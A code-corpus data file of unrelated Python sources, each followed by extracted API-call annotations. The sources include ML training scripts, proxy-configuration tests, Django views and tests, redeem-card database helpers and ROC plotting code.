] | [((108, 133), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (123, 133), False, 'import os\n'), ((2272, 2283), 'time.time', 'time.time', ([], {}), '()\n', (2281, 2283), False, 'import time\n'), ((2295, 2316), 'os.path.getsize', 'os.path.getsize', (['path'], {}), '(path)\n', (2310, 2316), False, 'import os\n'), ((603, 621), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {}), '()\n', (619, 621), False, 'import tempfile\n'), ((630, 642), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (638, 642), False, 'import os\n'), ((694, 723), 'os.path.getsize', 'os.path.getsize', (['self.tmpfile'], {}), '(self.tmpfile)\n', (709, 723), False, 'import os\n'), ((1005, 1022), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (1020, 1022), False, 'import os\n'), ((1085, 1216), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdin': 'subprocess.PIPE', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'env': 'env', 'universal_newlines': '(True)'}), '(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr\n =subprocess.PIPE, env=env, universal_newlines=True)\n', (1101, 1216), False, 'import subprocess\n'), ((2085, 2107), 'os.utime', 'os.utime', (['fname', 'times'], {}), '(fname, times)\n', (2093, 2107), False, 'import os\n'), ((2673, 2693), 'time.sleep', 'time.sleep', (['sleepfor'], {}), '(sleepfor)\n', (2683, 2693), False, 'import time\n'), ((2709, 2730), 'os.path.getsize', 'os.path.getsize', (['path'], {}), '(path)\n', (2724, 2730), False, 'import os\n'), ((1684, 1707), 'os.unlink', 'os.unlink', (['self.tmpfile'], {}), '(self.tmpfile)\n', (1693, 1707), False, 'import os\n'), ((2365, 2376), 'time.time', 'time.time', ([], {}), '()\n', (2374, 2376), False, 'import time\n')] |
import os
from data_loader.data_generator import DataGenerator
from models.invariant_basic import invariant_basic
from trainers.trainer import Trainer
from Utils.config import process_config
from Utils.dirs import create_dirs
from Utils import doc_utils
from Utils.utils import get_args
from data_loader import data_helper as helper
# capture the config path from the run arguments
# then process the json configuration file
config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json')
os.environ["CUDA_VISIBLE_DEVICES"] = config.gpu
import tensorflow.compat.v1 as tf
import numpy as np
tf.set_random_seed(1)
base_summary_folder = config.summary_dir
base_exp_name = config.exp_name
# create the experiments dirs
create_dirs([config.summary_dir, config.checkpoint_dir])
data = DataGenerator(config)
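# Grid search over learning rate, 2D/3D architecture widths and fully-connected
# layer sizes; each combination gets its own summary directory, session and trainer.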
for lr in [0.00008*(2**i) for i in range(2,8)]:
for a1d in [[5],[10]]:
for a3d in [[5], [10],[15]]:
for fully in [[50,50],[20,20]]:
config.learning_rate = lr
config.architecture2d = a1d
config.architecture = a3d
config.fc = fully
config.exp_name = base_exp_name + " lr={0}_a2d={1}_a3d = {2}_fc = {3}".format(lr, a1d,a3d,fully)
curr_dir = os.path.join(base_summary_folder, "lr={0}_a2d={1}_a3d = {2}_fc = {3}".format(lr, a1d, a3d, fully))
config.summary_dir = curr_dir
create_dirs([curr_dir])
# create your data generator
data.config.learning_rate=lr
data.config.architecture2d = a1d
data.config.architecture3d = a3d
data.config.fc = fully
gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
gpuconfig.gpu_options.visible_device_list = config.gpus_list
gpuconfig.gpu_options.allow_growth = True
sess = tf.Session(config=gpuconfig)
# create an instance of the model you want
model = invariant_basic(config, data)
# create trainer and pass all the previous components to it
trainer = Trainer(sess, model, data, config)
# here you train your model
acc, loss, _ = trainer.train()
sess.close()
tf.reset_default_graph()
import pandas as pd
def summary_10fold_results(summary_dir):
df = pd.read_csv(summary_dir+"/per_epoch_stats.csv")
acc = np.array(df["val_accuracy"])
print("Results")
print("Mean Accuracy = {0}".format(np.mean(acc)))
# print("Mean std = {0}".format(np.std(acc)))
return np.mean(acc)
| [
"Utils.dirs.create_dirs",
"Utils.config.process_config",
"pandas.read_csv",
"tensorflow.compat.v1.set_random_seed",
"tensorflow.compat.v1.Session",
"tensorflow.compat.v1.reset_default_graph",
"numpy.mean",
"data_loader.data_generator.DataGenerator",
"numpy.array",
"tensorflow.compat.v1.ConfigProto",
"models.invariant_basic.invariant_basic",
"trainers.trainer.Trainer"
] | [((434, 547), 'Utils.config.process_config', 'process_config', (['"""/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json"""'], {}), "(\n '/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json'\n )\n", (448, 547), False, 'from Utils.config import process_config\n'), ((640, 661), 'tensorflow.compat.v1.set_random_seed', 'tf.set_random_seed', (['(1)'], {}), '(1)\n', (658, 661), True, 'import tensorflow.compat.v1 as tf\n'), ((765, 821), 'Utils.dirs.create_dirs', 'create_dirs', (['[config.summary_dir, config.checkpoint_dir]'], {}), '([config.summary_dir, config.checkpoint_dir])\n', (776, 821), False, 'from Utils.dirs import create_dirs\n'), ((829, 850), 'data_loader.data_generator.DataGenerator', 'DataGenerator', (['config'], {}), '(config)\n', (842, 850), False, 'from data_loader.data_generator import DataGenerator\n'), ((2389, 2438), 'pandas.read_csv', 'pd.read_csv', (["(summary_dir + '/per_epoch_stats.csv')"], {}), "(summary_dir + '/per_epoch_stats.csv')\n", (2400, 2438), True, 'import pandas as pd\n'), ((2447, 2475), 'numpy.array', 'np.array', (["df['val_accuracy']"], {}), "(df['val_accuracy'])\n", (2455, 2475), True, 'import numpy as np\n'), ((2611, 2623), 'numpy.mean', 'np.mean', (['acc'], {}), '(acc)\n', (2618, 2623), True, 'import numpy as np\n'), ((2536, 2548), 'numpy.mean', 'np.mean', (['acc'], {}), '(acc)\n', (2543, 2548), True, 'import numpy as np\n'), ((1438, 1461), 'Utils.dirs.create_dirs', 'create_dirs', (['[curr_dir]'], {}), '([curr_dir])\n', (1449, 1461), False, 'from Utils.dirs import create_dirs\n'), ((1693, 1762), 'tensorflow.compat.v1.ConfigProto', 'tf.ConfigProto', ([], {'allow_soft_placement': '(True)', 'log_device_placement': '(False)'}), '(allow_soft_placement=True, log_device_placement=False)\n', (1707, 1762), True, 'import tensorflow.compat.v1 as tf\n'), ((1909, 1937), 'tensorflow.compat.v1.Session', 'tf.Session', ([], {'config': 'gpuconfig'}), '(config=gpuconfig)\n', (1919, 1937), True, 'import tensorflow.compat.v1 as tf\n'), ((2013, 2042), 'models.invariant_basic.invariant_basic', 'invariant_basic', (['config', 'data'], {}), '(config, data)\n', (2028, 2042), False, 'from models.invariant_basic import invariant_basic\n'), ((2137, 2171), 'trainers.trainer.Trainer', 'Trainer', (['sess', 'model', 'data', 'config'], {}), '(sess, model, data, config)\n', (2144, 2171), False, 'from trainers.trainer import Trainer\n'), ((2292, 2316), 'tensorflow.compat.v1.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (2314, 2316), True, 'import tensorflow.compat.v1 as tf\n')] |
import contextlib
import os
from unittest import TestCase
from seleniumwire.proxy.utils import get_upstream_proxy
class GetUpstreamProxyTest(TestCase):
def test_get_config(self):
options = {
'proxy': {
'http': 'http://username1:password1@server1:8888',
'https': 'https://username2:password2@server2:8888',
'no_proxy': 'localhost'
}
}
proxy = get_upstream_proxy(options)
http = proxy['http']
self.assertEqual('http', http.scheme)
self.assertEqual('username1', http.username)
self.assertEqual('password1', http.password)
self.assertEqual('server1:8888', http.hostport)
https = proxy['https']
self.assertEqual('https', https.scheme)
self.assertEqual('username2', https.username)
self.assertEqual('password2', https.password)
self.assertEqual('server2:8888', https.hostport)
self.assertEqual('localhost', proxy['no_proxy'])
def test_get_from_env(self):
with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',
HTTPS_PROXY='https://username2:password2@server2:8888',
NO_PROXY='localhost'):
proxy = get_upstream_proxy({})
http = proxy['http']
self.assertEqual('http', http.scheme)
self.assertEqual('username1', http.username)
self.assertEqual('password1', http.password)
self.assertEqual('server1:8888', http.hostport)
https = proxy['https']
self.assertEqual('https', https.scheme)
self.assertEqual('username2', https.username)
self.assertEqual('password2', https.password)
self.assertEqual('server2:8888', https.hostport)
self.assertEqual('localhost', proxy['no_proxy'])
def test_merge(self):
options = {
'proxy': {
'https': 'https://username3:password3@server3:8888',
'no_proxy': 'localhost'
}
}
with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',
HTTPS_PROXY='https://username2:password2@server2:8888',
NO_PROXY='127.0.0.1'):
proxy = get_upstream_proxy(options)
http = proxy['http']
self.assertEqual('http', http.scheme)
self.assertEqual('username1', http.username)
self.assertEqual('password1', http.password)
self.assertEqual('server1:8888', http.hostport)
# The dict config overrides that defined in env variables
https = proxy['https']
self.assertEqual('https', https.scheme)
self.assertEqual('username3', https.username)
self.assertEqual('password3', https.password)
self.assertEqual('server3:8888', https.hostport)
self.assertEqual('localhost', proxy['no_proxy'])
def test_none(self):
options = None
proxy = get_upstream_proxy(options)
self.assertEqual({}, proxy)
@contextlib.contextmanager
def set_env(self, **environ):
"""Context manager used to temporarily set environment vars."""
old_environ = dict(os.environ)
os.environ.update(environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
| [
"seleniumwire.proxy.utils.get_upstream_proxy",
"os.environ.update",
"os.environ.clear"
] | [((447, 474), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['options'], {}), '(options)\n', (465, 474), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((3075, 3102), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['options'], {}), '(options)\n', (3093, 3102), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((3325, 3351), 'os.environ.update', 'os.environ.update', (['environ'], {}), '(environ)\n', (3342, 3351), False, 'import os\n'), ((1282, 1304), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['{}'], {}), '({})\n', (1300, 1304), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((2326, 2353), 'seleniumwire.proxy.utils.get_upstream_proxy', 'get_upstream_proxy', (['options'], {}), '(options)\n', (2344, 2353), False, 'from seleniumwire.proxy.utils import get_upstream_proxy\n'), ((3412, 3430), 'os.environ.clear', 'os.environ.clear', ([], {}), '()\n', (3428, 3430), False, 'import os\n'), ((3443, 3473), 'os.environ.update', 'os.environ.update', (['old_environ'], {}), '(old_environ)\n', (3460, 3473), False, 'import os\n')] |
import torch
import torch.nn as nn
class DenseOmega(nn.Module):
"""
Dense (+symmetric) Omega matrix
which applies to vectorized state with shape (batch, c, n, 1).
"""
def __init__(self, n, c):
super(DenseOmega, self).__init__()
self.n = n
self.c = c
# self.fc should have bias=False
# but this does not have an effect due to the custom forward pass below
# the bug was not fixed to maintain compatibility with older model checkpoints
self.fc = nn.Linear(n*c, n*c)
def forward(self, v):
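        # Flatten the (batch, c, n, 1) state, apply the symmetrized weight
        # 0.5 * (W + W^T), and reshape back to the original layout.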
batch = v.shape[0]
x = v.reshape((batch, self.c*self.n, 1))
y1 = torch.matmul(self.fc.weight, x)
y2 = torch.matmul(self.fc.weight.t(), x)
return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1))
def dense_matrix(self):
return 0.5*(self.fc.weight + self.fc.weight.t()) | [
"torch.matmul",
"torch.nn.Linear"
] | [((522, 545), 'torch.nn.Linear', 'nn.Linear', (['(n * c)', '(n * c)'], {}), '(n * c, n * c)\n', (531, 545), True, 'import torch.nn as nn\n'), ((662, 693), 'torch.matmul', 'torch.matmul', (['self.fc.weight', 'x'], {}), '(self.fc.weight, x)\n', (674, 693), False, 'import torch\n')] |
from models.DAO import DAO
from utils.exception import ValidationError
from utils.validation import is_money
from models.shared import find_user
import string
from random import randint
# Prepare the char set for the coupon code
# Modify the char set according to your needs
# The char set contains all upper case letters and 0 to 9
char_set = list(string.ascii_uppercase)
[char_set.append(n) for n in range(0, 10)]
def generate_random_coupon_code():
# Generate a coupon code of length 16
return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)])
def add_redeem_cards(value, batch = 1):
# Clean the input data
value = str(value).strip()
batch = str(batch).strip()
    # Check whether the input is valid
if not is_money(value) or not batch.isdecimal():
raise ValidationError('Invalid input type.')
# Establish db connection
dao = DAO()
cursor = dao.cursor()
sql = """INSERT INTO redeem_card (
redeem_code,
value
) VALUES (
%(redeem_code)s,
%(value)s
)"""
for i in range(int(batch)):
cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value})
# Commit every 10 writes
if (i + 1) % 10 == 0:
dao.commit()
dao.commit()
def delete_redeem_card(redeem_code):
# Clean the input data
redeem_code = str(redeem_code).strip()
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Check if the redeem card exists
if find_redeem_card(redeem_code) is None:
raise ValidationError('The redeem card does not exists.')
sql = """DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s"""
cursor.execute(sql, {'redeem_code': redeem_code})
dao.commit()
def find_redeem_card(redeem_code):
# Clean the input data
param = str(redeem_code).strip()
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Query database
sql = """SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s"""
cursor.execute(sql, {'redeem_code': redeem_code})
result = cursor.fetchone()
return result
def get_redeem_cards(limit = 0, offset = 0):
# Clean the input data
limit = str(limit).strip()
offset = str(offset).strip()
if not limit.isdecimal() or not offset.isdecimal():
        raise ValidationError('Invalid pagination parameters.')
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Query database
sql = """SELECT * FROM redeem_card ORDER BY redeem_code ASC"""
if not int(limit) == 0:
sql += ' LIMIT ' + limit + ' OFFSET ' + offset
cursor.execute(sql)
result = cursor.fetchall()
return result
def redeem(user_id, redeem_code):
# Clean the input data
user_id = str(user_id).strip()
redeem_code = str(redeem_code).strip()
# Find redeem card
redeem_card = find_redeem_card(redeem_code)
if redeem_card is None:
        raise ValidationError('Invalid redeem code.')
# Find user
user = find_user(method = 'id', param = user_id)
if user is None:
raise ValidationError('user not found.')
# Establish db connection
dao = DAO()
cursor = dao.cursor()
sql = """UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s"""
new_balance = user['balance'] + redeem_card['value']
cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id})
sql = """DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s"""
cursor.execute(sql, {'redeem_code': redeem_code})
dao.commit()
def count_records_length():
# Establish db connection
dao = DAO()
cursor = dao.cursor()
# Query database
sql = """SELECT count(redeem_code) as len FROM redeem_card"""
cursor.execute(sql)
length = cursor.fetchone()['len']
return length | [
"models.shared.find_user",
"models.DAO.DAO",
"utils.exception.ValidationError",
"utils.validation.is_money"
] | [((892, 897), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (895, 897), False, 'from models.DAO import DAO\n'), ((1444, 1449), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (1447, 1449), False, 'from models.DAO import DAO\n'), ((1917, 1922), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (1920, 1922), False, 'from models.DAO import DAO\n'), ((2452, 2457), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (2455, 2457), False, 'from models.DAO import DAO\n'), ((3051, 3088), 'models.shared.find_user', 'find_user', ([], {'method': '"""id"""', 'param': 'user_id'}), "(method='id', param=user_id)\n", (3060, 3088), False, 'from models.shared import find_user\n'), ((3204, 3209), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (3207, 3209), False, 'from models.DAO import DAO\n'), ((3670, 3675), 'models.DAO.DAO', 'DAO', ([], {}), '()\n', (3673, 3675), False, 'from models.DAO import DAO\n'), ((812, 850), 'utils.exception.ValidationError', 'ValidationError', (['"""Invalid input type."""'], {}), "('Invalid input type.')\n", (827, 850), False, 'from utils.exception import ValidationError\n'), ((1575, 1626), 'utils.exception.ValidationError', 'ValidationError', (['"""The redeem card does not exists."""'], {}), "('The redeem card does not exists.')\n", (1590, 1626), False, 'from utils.exception import ValidationError\n'), ((2360, 2410), 'utils.exception.ValidationError', 'ValidationError', (['"""IInvalid pagination parameters."""'], {}), "('IInvalid pagination parameters.')\n", (2375, 2410), False, 'from utils.exception import ValidationError\n'), ((2983, 3022), 'utils.exception.ValidationError', 'ValidationError', (['"""Invalid redeen code."""'], {}), "('Invalid redeen code.')\n", (2998, 3022), False, 'from utils.exception import ValidationError\n'), ((3128, 3162), 'utils.exception.ValidationError', 'ValidationError', (['"""user not found."""'], {}), "('user not found.')\n", (3143, 3162), False, 'from utils.exception import ValidationError\n'), ((756, 771), 'utils.validation.is_money', 'is_money', (['value'], {}), '(value)\n', (764, 771), False, 'from utils.validation import is_money\n')] |
import uuid
from django.test import TestCase
from django.shortcuts import resolve_url as r
from eventex.subscriptions.models import Subscription
class SubscriptionDetailGet(TestCase):
def setUp(self):
self.obj = Subscription.objects.create(
name='<NAME>',
cpf='12345678901',
email='<EMAIL>',
phone='938654321'
)
self.response = self.client.get(r('subscriptions:detail', self.obj.uid))
def test_get(self):
self.assertEqual(200, self.response.status_code)
def test_template_used(self):
self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html')
def test_context(self):
subscription = self.response.context['subscription']
self.assertIsInstance(subscription, Subscription)
def test_html(self):
contents = (
self.obj.name,
self.obj.cpf,
self.obj.email,
self.obj.phone
)
for content in contents:
with self.subTest():
self.assertContains(self.response, content)
class SubscriptionDetailNotFound(TestCase):
def setUp(self):
uid = uuid.uuid4()
self.response = self.client.get(r('subscriptions:detail', uid))
def test_not_found(self):
self.assertEqual(404, self.response.status_code) | [
"eventex.subscriptions.models.Subscription.objects.create",
"uuid.uuid4",
"django.shortcuts.resolve_url"
] | [((227, 329), 'eventex.subscriptions.models.Subscription.objects.create', 'Subscription.objects.create', ([], {'name': '"""<NAME>"""', 'cpf': '"""12345678901"""', 'email': '"""<EMAIL>"""', 'phone': '"""938654321"""'}), "(name='<NAME>', cpf='12345678901', email=\n '<EMAIL>', phone='938654321')\n", (254, 329), False, 'from eventex.subscriptions.models import Subscription\n'), ((1189, 1201), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1199, 1201), False, 'import uuid\n'), ((423, 462), 'django.shortcuts.resolve_url', 'r', (['"""subscriptions:detail"""', 'self.obj.uid'], {}), "('subscriptions:detail', self.obj.uid)\n", (424, 462), True, 'from django.shortcuts import resolve_url as r\n'), ((1242, 1272), 'django.shortcuts.resolve_url', 'r', (['"""subscriptions:detail"""', 'uid'], {}), "('subscriptions:detail', uid)\n", (1243, 1272), True, 'from django.shortcuts import resolve_url as r\n')] |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('expand', views.expand),
path('upload', views.upload),
path('comment', views.add_comment),
path('public_data', views.get_public_data),
] | [
"django.urls.path"
] | [((70, 91), 'django.urls.path', 'path', (['""""""', 'views.index'], {}), "('', views.index)\n", (74, 91), False, 'from django.urls import path\n'), ((97, 125), 'django.urls.path', 'path', (['"""expand"""', 'views.expand'], {}), "('expand', views.expand)\n", (101, 125), False, 'from django.urls import path\n'), ((131, 159), 'django.urls.path', 'path', (['"""upload"""', 'views.upload'], {}), "('upload', views.upload)\n", (135, 159), False, 'from django.urls import path\n'), ((165, 199), 'django.urls.path', 'path', (['"""comment"""', 'views.add_comment'], {}), "('comment', views.add_comment)\n", (169, 199), False, 'from django.urls import path\n'), ((205, 247), 'django.urls.path', 'path', (['"""public_data"""', 'views.get_public_data'], {}), "('public_data', views.get_public_data)\n", (209, 247), False, 'from django.urls import path\n')] |
import MySQLdb
def antisql(content):
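    # Naive SQL-injection guard: returns 1 if the content contains any of the
    # blacklisted keywords/characters below, otherwise 0.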
antistr=u"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,".split(u"|")
for i in range (len(antistr)):
if antistr[i] in content:
return 1
return 0
def sql_select(text):
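    # Open a MySQL connection, run the given query, and return all fetched rows.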
conn=MySQLdb.connect(host='localhost',user="root",passwd="<PASSWORD>",db="dimcreator",port=3306,charset='utf8')
cur = conn.cursor()
cur.execute(text)
res=cur.fetchall()
cur.close()
conn.commit()
conn.close()
return res
def sql_write(text):
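    # Open a MySQL connection, execute the given write statement, and commit.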
conn=MySQLdb.connect(host='localhost',user="root",passwd="<PASSWORD>",db="dimcreator",port=3306,charset='utf8')
cur = conn.cursor()
cur.execute(text)
cur.close()
conn.commit()
conn.close()
| [
"MySQLdb.connect"
] | [((317, 433), 'MySQLdb.connect', 'MySQLdb.connect', ([], {'host': '"""localhost"""', 'user': '"""root"""', 'passwd': '"""<PASSWORD>"""', 'db': '"""dimcreator"""', 'port': '(3306)', 'charset': '"""utf8"""'}), "(host='localhost', user='root', passwd='<PASSWORD>', db=\n 'dimcreator', port=3306, charset='utf8')\n", (332, 433), False, 'import MySQLdb\n'), ((591, 707), 'MySQLdb.connect', 'MySQLdb.connect', ([], {'host': '"""localhost"""', 'user': '"""root"""', 'passwd': '"""<PASSWORD>"""', 'db': '"""dimcreator"""', 'port': '(3306)', 'charset': '"""utf8"""'}), "(host='localhost', user='root', passwd='<PASSWORD>', db=\n 'dimcreator', port=3306, charset='utf8')\n", (606, 707), False, 'import MySQLdb\n')] |
import os
import shutil
prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_'
prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_'
for idx in range(120):
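    # Split the flat job index into the (tidx, midx) pair used in the gp_<tidx>_<midx>.db filename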
tidx=idx//10
midx=idx%10
path=prepath_out+str(idx)+'/'
os.mkdir(path)
filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db')
shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename)
print(path)
# os.rename(prepath_in+str(idx)+'.err', prepath_out+str(idx)+'/EUCLID_GridPlot_56234229_'+str(idx)+'.err')
| [
"os.mkdir"
] | [((351, 365), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (359, 365), False, 'import os\n')] |
# Generated by Django 2.2 on 2019-04-24 03:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='customuser',
name='ward_name',
),
migrations.AddField(
model_name='customuser',
name='shifts_per_roster',
field=models.IntegerField(default=10),
preserve_default=False,
),
]
| [
"django.db.migrations.RemoveField",
"django.db.models.IntegerField"
] | [((220, 285), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""customuser"""', 'name': '"""ward_name"""'}), "(model_name='customuser', name='ward_name')\n", (242, 285), False, 'from django.db import migrations, models\n'), ((444, 475), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(10)'}), '(default=10)\n', (463, 475), False, 'from django.db import migrations, models\n')] |
"""Methods used to build ROC."""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import roc_curve, auc
# seaborn settings
sns.set_style("white")
sns.set_context("paper")
color_palette = sns.color_palette("colorblind")
sns.set_palette(color_palette)
def _get_total_undirected_interactions(n):
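    # Number of unordered node pairs: n choose 2 = n * (n - 1) / 2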
return n * (n - 1) / 2
def _check_index(index, labels_set, interaction_symbol='<->'):
e1, e2 = index.split(interaction_symbol)
return (e1 in labels_set and e2 in labels_set)
def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'):
labels_set = set(labels)
filtering = pd.Series([
_check_index(index, labels_set, interaction_symbol)
for index in indexes
])
return indexes[filtering]
def _is_index_diagonal(index, interaction_indices='<->'):
a_node, another_node = index.split(interaction_indices)
return a_node == another_node
def _get_evaluation_on_given_labels(
labels, true_interactions, predicted_interactions, no_self_loops=True
):
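    # Build aligned label/score vectors over all possible undirected pairs:
    # observed interactions keep their intensities, and the remaining pairs
    # are padded with zeros so the ROC metrics see the full interaction space.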
total_interactions = _get_total_undirected_interactions(len(labels))
interaction_indices = list(
set(
_filter_indices_with_labels(predicted_interactions.index, labels) |
_filter_indices_with_labels(true_interactions.index, labels)
)
)
if no_self_loops:
interaction_indices = [
index
for index in interaction_indices
if not _is_index_diagonal(index)
]
predicted_interactions = predicted_interactions.reindex(
interaction_indices
).fillna(0.0)
true_interactions = true_interactions.reindex(
interaction_indices
).fillna(0.0)
zero_interactions = int(total_interactions) - len(interaction_indices)
y = np.append(true_interactions.values, np.zeros((zero_interactions)))
scores = np.append(
predicted_interactions.values, np.zeros((zero_interactions))
)
return y, scores
def get_roc_df(
pathway_name, method_name, true_interactions, predicted_interactions,
number_of_roc_points=100
):
"""Return dataframe that can be used to plot a ROC curve."""
labels = {
gene
for genes in [
true_interactions.e1, predicted_interactions.e1,
true_interactions.e2, predicted_interactions.e2
]
for gene in genes
}
y, scores = _get_evaluation_on_given_labels(
labels, true_interactions.intensity,
predicted_interactions.intensity
)
# print(method_name, y, scores)
reference_xx = np.linspace(0, 1, number_of_roc_points)
if sum(y) > 0:
xx, yy, threshold = roc_curve(y, scores)
print(method_name, y, scores, threshold, xx, yy)
area_under_curve = auc(xx, yy)
yy = np.interp(reference_xx, xx, yy)
else:
yy = reference_xx
area_under_curve = 0.5 # worst
roc_df = pd.DataFrame({
'pathway': number_of_roc_points * [pathway_name],
'method': (
number_of_roc_points * [method_name]
),
'YY': yy,
'XX': reference_xx.tolist()
})
return roc_df, area_under_curve
def plot_roc_curve_from_df(
df, auc_dict_list=None, output_filepath=None, figsize=(6, 6)
):
"""From a df with multiple methods plot a roc curve using sns.tspot."""
    xlabel = 'False Positive Rate'
ylabel = 'True Positive Rate'
title = 'Receiver Operating Characteristic'
# rename method name to include AUC to show it in legend
if auc_dict_list:
for method in auc_dict_list.keys():
mean_auc = np.mean(auc_dict_list[method])
method_indices = df['method'] == method
df['mean_auc'] = mean_auc
df.loc[method_indices, 'method'] = (
'{} '.format(
method.capitalize()
if method != 'INtERAcT'
else method
) +
'AUC=%0.2f' % mean_auc
)
df = df.sort_values(by='method')
df.rename(columns={'method': ''}, inplace=True) # to avoid legend title
plt.figure(figsize=figsize)
sns.set_style("whitegrid", {'axes.grid': False})
sns.tsplot(
data=df, time='XX', value='YY',
condition='', unit='pathway', legend=True
)
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
if output_filepath:
plt.savefig(output_filepath, bbox_inches='tight')
| [
"matplotlib.pyplot.title",
"seaborn.set_style",
"matplotlib.pyplot.xlim",
"sklearn.metrics.roc_curve",
"matplotlib.pyplot.ylim",
"seaborn.tsplot",
"numpy.zeros",
"sklearn.metrics.auc",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.linspace",
"seaborn.color_palette",
"numpy.interp",
"matplotlib.pyplot.ylabel",
"seaborn.set_palette",
"matplotlib.pyplot.xlabel",
"seaborn.set_context",
"matplotlib.pyplot.savefig"
] | [((190, 212), 'seaborn.set_style', 'sns.set_style', (['"""white"""'], {}), "('white')\n", (203, 212), True, 'import seaborn as sns\n'), ((213, 237), 'seaborn.set_context', 'sns.set_context', (['"""paper"""'], {}), "('paper')\n", (228, 237), True, 'import seaborn as sns\n'), ((254, 285), 'seaborn.color_palette', 'sns.color_palette', (['"""colorblind"""'], {}), "('colorblind')\n", (271, 285), True, 'import seaborn as sns\n'), ((286, 316), 'seaborn.set_palette', 'sns.set_palette', (['color_palette'], {}), '(color_palette)\n', (301, 316), True, 'import seaborn as sns\n'), ((2613, 2652), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'number_of_roc_points'], {}), '(0, 1, number_of_roc_points)\n', (2624, 2652), True, 'import numpy as np\n'), ((4156, 4183), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (4166, 4183), True, 'import matplotlib.pyplot as plt\n'), ((4188, 4236), 'seaborn.set_style', 'sns.set_style', (['"""whitegrid"""', "{'axes.grid': False}"], {}), "('whitegrid', {'axes.grid': False})\n", (4201, 4236), True, 'import seaborn as sns\n'), ((4241, 4330), 'seaborn.tsplot', 'sns.tsplot', ([], {'data': 'df', 'time': '"""XX"""', 'value': '"""YY"""', 'condition': '""""""', 'unit': '"""pathway"""', 'legend': '(True)'}), "(data=df, time='XX', value='YY', condition='', unit='pathway',\n legend=True)\n", (4251, 4330), True, 'import seaborn as sns\n'), ((4353, 4369), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 1]'], {}), '([0, 1])\n', (4361, 4369), True, 'import matplotlib.pyplot as plt\n'), ((4374, 4390), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0, 1]'], {}), '([0, 1])\n', (4382, 4390), True, 'import matplotlib.pyplot as plt\n'), ((4395, 4413), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (4405, 4413), True, 'import matplotlib.pyplot as plt\n'), ((4418, 4436), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (4428, 4436), True, 'import matplotlib.pyplot as plt\n'), ((4441, 4457), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (4450, 4457), True, 'import matplotlib.pyplot as plt\n'), ((1863, 1890), 'numpy.zeros', 'np.zeros', (['zero_interactions'], {}), '(zero_interactions)\n', (1871, 1890), True, 'import numpy as np\n'), ((1957, 1984), 'numpy.zeros', 'np.zeros', (['zero_interactions'], {}), '(zero_interactions)\n', (1965, 1984), True, 'import numpy as np\n'), ((2700, 2720), 'sklearn.metrics.roc_curve', 'roc_curve', (['y', 'scores'], {}), '(y, scores)\n', (2709, 2720), False, 'from 